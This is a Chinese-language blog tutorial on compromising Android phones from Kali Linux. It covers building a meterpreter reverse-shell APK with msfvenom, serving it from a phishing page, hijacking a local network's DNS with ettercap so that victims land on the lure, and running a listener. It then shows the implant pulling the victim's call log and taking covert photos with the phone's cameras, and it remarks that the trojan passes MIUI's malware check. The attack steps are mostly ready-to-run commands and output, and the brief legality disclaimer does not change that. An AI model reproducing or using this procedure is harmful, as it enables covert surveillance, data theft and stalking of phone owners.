Kali利用Android木馬滲透手機

Kali利用Android木馬滲透手機(高級篇)
利用DNS劫持內網準備釣魚網頁誘導下載安裝安卓木馬
附上參考材料:https://weibo.com/kx99984
前言
內網滲透,非公網IP上線。?不得非法入侵他人設備,侵犯別人隱私是十分可恥惡心的事情。
互聯(lián)網非法外之地,還請各位兄弟謹記,且行且珍惜。
第一步
生成安卓木馬
msfvenom?-p android/meterpreter/reverse_tcp?LHOST=kali本機ip?LPORT=監(jiān)聽端口?R?>?/放置的目錄/文件名.apk

第二步制作釣魚網頁
在這里我已經簡單的準備了一個頁面?代碼如下

將生成的木馬和編寫頁面放置到/var/www/html/目錄下

然后啟動Apache2
systemctl start apache2
第三步開啟DNS劫持
*編輯ettercap的DNS文件
nano?/etc/ettercap/etter.dns

*啟動ettercap
ettercap?-G

*操作步驟

在彈出的窗口選擇自己的網卡然后掃描內網IP

選擇網關?add to target 1?選擇目標?add to target 2

點擊圖中的菜單在之后彈出的選項中選擇第一個然后確定


然后我們開啟攻擊

開啟攻擊后我們打開插件雙擊dns_spoof進行DNS毒化操作

手機端狀態(tài)
此時我們手機端無法聯(lián)網,訪問任何網頁都是我們實現(xiàn)安排好的頁面效果如下


可以看到木馬是沒有報毒的,至少在MIUI11下是沒有提示有病毒,并且申請了很多的權限。
啟動木馬監(jiān)聽等待目標上線
我們在終端啟動msfconsole依次執(zhí)行:
use exploit/multi/handler
set?payload android/meterpreter/reverse_tcp
set?LHOST?192.168.123.10?//kali?本機的ip
set?LPORT?9055??//監(jiān)聽上線的端口?需要與生成木馬的時候填寫一樣
exploit???//執(zhí)行監(jiān)聽

然后我們靜等目標上線

上面這張圖是目標上線后的樣子,當目標上線后我們就可以停止DNS劫持了
當關閉劫持后目標恢復網絡連接。
使用木馬竊取信息
現(xiàn)在我們先使用木馬竊取對方通話記錄?在終端輸入dump_calllog?此時返回的數(shù)據(jù)應該是
meterpreter?>?dump_calllog
[*] Fetching?243?entries
[*] Call log saved to calllog_dump_20191126214943.txt
meterpreter?>
然后我們去root目錄下能看到抓取到的通話記錄打開后

接下來利用木馬進行拍照?在終端輸入webcam_list獲取目標手機的攝像頭數(shù)量
meterpreter?>?webcam_list
1:?Back Camera
2:?Front Camera
meterpreter?>
返回給我們兩個攝像頭?一個前置一個后置?我們利用?webcam_snap -i?指定一個攝像頭進行拍照
webcam_snap?-i?1
命令執(zhí)行完成之后會自動打開照片展示出來

結尾
安卓木馬的功能不僅僅只有這么一些,剩下的東西也是需要大家自己去摸索的,好了本次教程到此結束,還是需要提醒大家不要做出違法的事情,謝謝。
附上文章出處:https://weibo.com/kx99984